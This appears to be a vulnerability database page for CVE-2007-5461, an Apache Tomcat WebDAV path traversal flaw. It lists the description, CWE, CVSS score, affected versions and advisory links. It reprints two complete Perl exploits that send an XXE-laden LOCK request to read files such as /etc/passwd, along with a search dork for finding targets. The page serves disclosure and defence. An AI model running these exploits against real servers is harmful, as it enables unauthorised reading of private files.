CVE-2007-5461 Detail

CVE-2007-5461

CVE Descriptions

Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-22	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	3.5		AV:N/AC:M/Au:S/C:P/I:N/A:N	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 4552

Publication date : 2007-10-20 22h00 +00:00
Author : h3rcul3s
EDB Verified : Yes

#!/usr/bin/perl #================================================================ # Apache Tomcat Remote File Disclosure Zeroday Xploit - With support for SSL # MoDiFiEd version by : h3rcul3s # ORiGiNaL Version by : kcdarookie aka eliteb0y / 2007 http://milw0rm.org/exploits/4530 # MoDiFiCaTiOn : This code is useble against targets over SSL # Prerequisites : A valid login credentials, webdav # DoRk : intitle:"Directory Listing For /" + inurl:webdav tomcat # Potential targets : similar to https://www.somehost.com:8443 #================================================================ # THaNkS To eliteb0y, the whole team AnD "perlmonks". # This piece of code is written ONLY for educational purpose. # Use it at your own risk. # No author will be responsible for any damage. #================================================================ # -------------------------[C O D E]----------------------------- #================================================================ use LWP::Protocol::https; use IO::Socket; use MIME::Base64; ### FIXME! Maybe support other auths too ? # SET REMOTE PORT HERE-------------------------------------------- $remoteport = 8443; sub usage { print "\nApache Tomcat Remote File Disclosure Zeroday Xploit\n"; print "\n\n"; print "Basic exploit by : kcdarookie aka eliteb0y / 2007\n"; print "SSL Support added by : .o0|h 3 r c u l 3 s|0o. \n"; print "\n\n"; print "USAGE :\nperl TOMCATXPL-SSL <remotehost> <webdav file> <file to retrieve> [username] [password] [https]\n"; print "\nExample:\nperl TOMCATXPL-SSL www.hostname.com /webdav /etc/passwd tomcat tomcat https\n\n";exit; } if ($#ARGV < 2) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $remotefile = $ARGV[2]; $username = $ARGV[3]; $password = $ARGV[4]; my $sock = LWP::Protocol::https::Socket->new(PeerAddr => $hostname, PeerPort => $remoteport, Proto => 'tcp'); $|=1; $BasicAuth = encode_base64("$username:$password"); $KRADXmL = "<?xml version=\"1.0\"?>\n" ."<!DOCTYPE REMOTE [\n" ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n" ."]>\n" ."<D:lockinfo xmlns:D='DAV:'>\n" ."<D:lockscope><D:exclusive/></D:lockscope>\n" ."<D:locktype><D:write/></D:locktype>\n" ."<D:owner>\n" ."<D:href>\n" ."<REMOTE>\n" ."<RemoteX>&RemoteX;</RemoteX>\n" ."</REMOTE>\n" ."</D:href>\n" ."</D:owner>\n" ."</D:lockinfo>\n"; print "\nApache Tomcat Remote File Disclosure Zeroday Eploit-SSL verssion\n"; print "\n"; print "Launching Remote Exploit over SSL...\n"; $ExploitRequest = "LOCK $webdavfile HTTP/1.1\r\n" ."Host: $hostname\r\n"; if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL; print $sock $ExploitRequest; while(<$sock>) { print; } # milw0rm.com [2007-10-21]

Exploit Database EDB-ID : 4530

Publication date : 2007-10-13 22h00 +00:00
Author : eliteboy
EDB Verified : Yes

#!/usr/bin/perl #****************************************************** # Apache Tomcat Remote File Disclosure Zeroday Xploit # kcdarookie aka eliteb0y / 2007 # # thanx to the whole team & andi :) # +++KEEP PRIV8+++ # # This Bug may reside in different WebDav implementations, # Warp your mind! # +You will need auth for the exploit to work... #****************************************************** use IO::Socket; use MIME::Base64; ### FIXME! Maybe support other auths too ? # SET REMOTE PORT HERE $remoteport = 8080; sub usage { print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; print "kcdarookie aka eliteb0y / 2007\n"; print "usage: perl TOMCATXPL <remotehost> <webdav file> <file to retrieve> [username] [password]\n"; print "example: perl TOMCATXPL www.hostname.com /webdav /etc/passwd tomcat tomcat\n";exit; } if ($#ARGV < 2) {usage();} $hostname = $ARGV[0]; $webdavfile = $ARGV[1]; $remotefile = $ARGV[2]; $username = $ARGV[3]; $password = $ARGV[4]; my $sock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $remoteport, Proto => 'tcp'); $|=1; $BasicAuth = encode_base64("$username:$password"); $KRADXmL = "<?xml version=\"1.0\"?>\n" ."<!DOCTYPE REMOTE [\n" ."<!ENTITY RemoteX SYSTEM \"$remotefile\">\n" ."]>\n" ."<D:lockinfo xmlns:D='DAV:'>\n" ."<D:lockscope><D:exclusive/></D:lockscope>\n" ."<D:locktype><D:write/></D:locktype>\n" ."<D:owner>\n" ."<D:href>\n" ."<REMOTE>\n" ."<RemoteX>&RemoteX;</RemoteX>\n" ."</REMOTE>\n" ."</D:href>\n" ."</D:owner>\n" ."</D:lockinfo>\n"; print "Apache Tomcat Remote File Disclosure Zeroday Xploit\n"; print "kcdarookie aka eliteb0y / 2007\n"; print "Launching Remote Exploit...\n"; $ExploitRequest = "LOCK $webdavfile HTTP/1.1\r\n" ."Host: $hostname\r\n"; if ($username ne "") { $ExploitRequest .= "Authorization: Basic $BasicAuth\r\n"; } $ExploitRequest .= "Content-Type: text/xml\r\nContent-Length: ".length($KRADXmL)."\r\n\r\n" . $KRADXmL; print $sock $ExploitRequest; while(<$sock>) { print; } # milw0rm.com [2007-10-14]

Products Mentioned

Configuraton 0

Apache>>Tomcat >> Version 4.0.0

Apache>>Tomcat >> Version 4.0.0 (Open CPE detail)

Apache>>Tomcat >> Version 4.0.1

Apache>>Tomcat >> Version 4.0.1 (Open CPE detail)

Apache>>Tomcat >> Version 4.0.2

Apache>>Tomcat >> Version 4.0.2 (Open CPE detail)

Apache>>Tomcat >> Version 4.0.3

Apache>>Tomcat >> Version 4.0.3 (Open CPE detail)

Apache>>Tomcat >> Version 4.0.4

Apache>>Tomcat >> Version 4.0.4 (Open CPE detail)

Apache>>Tomcat >> Version 4.0.5

Apache>>Tomcat >> Version 4.0.5 (Open CPE detail)

Apache>>Tomcat >> Version 4.0.6

Apache>>Tomcat >> Version 4.0.6 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.0

Apache>>Tomcat >> Version 4.1.0 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.1

Apache>>Tomcat >> Version 4.1.1 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.2

Apache>>Tomcat >> Version 4.1.2 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.3

Apache>>Tomcat >> Version 4.1.3 (Open CPE detail)
Apache>>Tomcat >> Version 4.1.3 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.4

Apache>>Tomcat >> Version 4.1.4 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.5

Apache>>Tomcat >> Version 4.1.5 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.6

Apache>>Tomcat >> Version 4.1.6 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.7

Apache>>Tomcat >> Version 4.1.8

Apache>>Tomcat >> Version 4.1.8 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.9

Apache>>Tomcat >> Version 4.1.9 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.10

Apache>>Tomcat >> Version 4.1.10 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.11

Apache>>Tomcat >> Version 4.1.11 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.12

Apache>>Tomcat >> Version 4.1.12 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.13

Apache>>Tomcat >> Version 4.1.13 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.14

Apache>>Tomcat >> Version 4.1.14 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.15

Apache>>Tomcat >> Version 4.1.15 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.16

Apache>>Tomcat >> Version 4.1.16 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.17

Apache>>Tomcat >> Version 4.1.17 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.18

Apache>>Tomcat >> Version 4.1.18 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.19

Apache>>Tomcat >> Version 4.1.19 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.20

Apache>>Tomcat >> Version 4.1.20 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.21

Apache>>Tomcat >> Version 4.1.21 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.22

Apache>>Tomcat >> Version 4.1.22 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.23

Apache>>Tomcat >> Version 4.1.23 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.24

Apache>>Tomcat >> Version 4.1.24 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.25

Apache>>Tomcat >> Version 4.1.25 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.26

Apache>>Tomcat >> Version 4.1.26 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.27

Apache>>Tomcat >> Version 4.1.27 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.28

Apache>>Tomcat >> Version 4.1.28 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.29

Apache>>Tomcat >> Version 4.1.29 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.30

Apache>>Tomcat >> Version 4.1.30 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.31

Apache>>Tomcat >> Version 4.1.31 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.32

Apache>>Tomcat >> Version 4.1.32 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.33

Apache>>Tomcat >> Version 4.1.33 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.34

Apache>>Tomcat >> Version 4.1.35

Apache>>Tomcat >> Version 4.1.35 (Open CPE detail)

Apache>>Tomcat >> Version 4.1.36

Apache>>Tomcat >> Version 4.1.36 (Open CPE detail)

References

http://www.debian.org/security/2008/dsa-1453
Tags : vendor-advisory, x_refsource_DEBIAN

http://tomcat.apache.org/security-4.html
Tags : x_refsource_CONFIRM

http://secunia.com/advisories/30908
Tags : third-party-advisory, x_refsource_SECUNIA

http://support.apple.com/kb/HT2163
Tags : x_refsource_CONFIRM

http://mail-archives.apache.org/mod_mbox/tomcat-users/200710.mbox/%3C47135C2D.1000705%40apache.org%3E
Tags : mailing-list, x_refsource_MLIST

http://www.securityfocus.com/bid/26070
Tags : vdb-entry, x_refsource_BID

http://secunia.com/advisories/27446
Tags : third-party-advisory, x_refsource_SECUNIA

http://marc.info/?l=full-disclosure&m=119239530508382
Tags : mailing-list, x_refsource_FULLDISC

http://secunia.com/advisories/30676
Tags : third-party-advisory, x_refsource_SECUNIA

http://rhn.redhat.com/errata/RHSA-2008-0630.html
Tags : vendor-advisory, x_refsource_REDHAT

http://sunsolve.sun.com/search/document.do?assetkey=1-26-239312-1
Tags : vendor-advisory, x_refsource_SUNALERT

https://exchange.xforce.ibmcloud.com/vulnerabilities/37243
Tags : vdb-entry, x_refsource_XF

https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A9202
Tags : vdb-entry, signature, x_refsource_OVAL

http://www.redhat.com/support/errata/RHSA-2008-0862.html
Tags : vendor-advisory, x_refsource_REDHAT

http://www.vupen.com/english/advisories/2008/1981/references
Tags : vdb-entry, x_refsource_VUPEN

http://secunia.com/advisories/30899
Tags : third-party-advisory, x_refsource_SECUNIA

https://www.redhat.com/archives/fedora-package-announce/2007-November/msg00525.html
Tags : vendor-advisory, x_refsource_FEDORA

http://secunia.com/advisories/31493
Tags : third-party-advisory, x_refsource_SECUNIA

http://secunia.com/advisories/29242
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.vupen.com/english/advisories/2008/2823
Tags : vdb-entry, x_refsource_VUPEN

http://secunia.com/advisories/37460
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.vupen.com/english/advisories/2008/1979/references
Tags : vdb-entry, x_refsource_VUPEN

http://secunia.com/advisories/29313
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.securityfocus.com/bid/31681
Tags : vdb-entry, x_refsource_BID

http://secunia.com/advisories/32120
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.vupen.com/english/advisories/2007/3671
Tags : vdb-entry, x_refsource_VUPEN

http://www.vmware.com/security/advisories/VMSA-2009-0016.html
Tags : x_refsource_CONFIRM

http://secunia.com/advisories/27398
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.redhat.com/support/errata/RHSA-2008-0042.html
Tags : vendor-advisory, x_refsource_REDHAT

http://lists.opensuse.org/opensuse-security-announce/2008-03/msg00001.html
Tags : vendor-advisory, x_refsource_SUSE

http://www.securitytracker.com/id?1018864
Tags : vdb-entry, x_refsource_SECTRACK

http://secunia.com/advisories/28361
Tags : third-party-advisory, x_refsource_SECUNIA

http://secunia.com/advisories/28317
Tags : third-party-advisory, x_refsource_SECUNIA

http://lists.apple.com/archives/security-announce/2008//Jun/msg00002.html
Tags : vendor-advisory, x_refsource_APPLE

http://support.avaya.com/elmodocs2/security/ASA-2008-401.htm
Tags : x_refsource_CONFIRM

http://www.vupen.com/english/advisories/2007/3674
Tags : vdb-entry, x_refsource_VUPEN

http://www.securityfocus.com/archive/1/507985/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ

http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html
Tags : vendor-advisory, x_refsource_SUSE

http://tomcat.apache.org/security-6.html
Tags : x_refsource_CONFIRM

http://secunia.com/advisories/57126
Tags : third-party-advisory, x_refsource_SECUNIA

http://secunia.com/advisories/32222
Tags : third-party-advisory, x_refsource_SECUNIA

http://secunia.com/advisories/30802
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.redhat.com/support/errata/RHSA-2008-0195.html
Tags : vendor-advisory, x_refsource_REDHAT

http://security.gentoo.org/glsa/glsa-200804-10.xml
Tags : vendor-advisory, x_refsource_GENTOO

http://geronimo.apache.org/2007/10/18/potential-vulnerability-in-apache-tomcat-webdav-servlet.html
Tags : x_refsource_CONFIRM

http://www.vupen.com/english/advisories/2007/3622
Tags : vdb-entry, x_refsource_VUPEN

http://www-1.ibm.com/support/docview.wss?uid=swg21286112
Tags : x_refsource_CONFIRM

http://secunia.com/advisories/27727
Tags : third-party-advisory, x_refsource_SECUNIA

http://www.vupen.com/english/advisories/2008/1856/references
Tags : vdb-entry, x_refsource_VUPEN

http://www.vmware.com/security/advisories/VMSA-2008-0010.html
Tags : x_refsource_CONFIRM

http://tomcat.apache.org/security-5.html
Tags : x_refsource_CONFIRM

http://www.vupen.com/english/advisories/2008/2780
Tags : vdb-entry, x_refsource_VUPEN

http://www.redhat.com/support/errata/RHSA-2008-0261.html
Tags : vendor-advisory, x_refsource_REDHAT

https://www.exploit-db.com/exploits/4530
Tags : exploit, x_refsource_EXPLOIT-DB

http://www.mandriva.com/security/advisories?name=MDVSA-2009:136
Tags : vendor-advisory, x_refsource_MANDRIVA

http://www.debian.org/security/2008/dsa-1447
Tags : vendor-advisory, x_refsource_DEBIAN

http://secunia.com/advisories/27481
Tags : third-party-advisory, x_refsource_SECUNIA

http://marc.info/?l=bugtraq&m=139344343412337&w=2
Tags : vendor-advisory, x_refsource_HP

http://lists.apple.com/archives/security-announce/2008/Oct/msg00001.html
Tags : vendor-advisory, x_refsource_APPLE

http://support.apple.com/kb/HT3216
Tags : x_refsource_CONFIRM

http://www.mandriva.com/security/advisories?name=MDKSA-2007:241
Tags : vendor-advisory, x_refsource_MANDRIVA

http://secunia.com/advisories/29711
Tags : third-party-advisory, x_refsource_SECUNIA

http://issues.apache.org/jira/browse/GERONIMO-3549
Tags : x_refsource_MISC

http://www.vupen.com/english/advisories/2009/3316
Tags : vdb-entry, x_refsource_VUPEN

http://secunia.com/advisories/32266
Tags : third-party-advisory, x_refsource_SECUNIA

https://lists.apache.org/thread.html/29dc6c2b625789e70a9c4756b5a327e6547273ff8bde7e0327af48c5%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST

https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST

https://lists.apache.org/thread.html/c62b0e3a7bf23342352a5810c640a94b6db69957c5c19db507004d74%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST

https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST

https://lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST

https://lists.apache.org/thread.html/rb71997f506c6cc8b530dd845c084995a9878098846c7b4eacfae8db3%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST

https://lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf%40%3Cdev.tomcat.apache.org%3E
Tags : mailing-list, x_refsource_MLIST

CVE-2007-5461 : Detail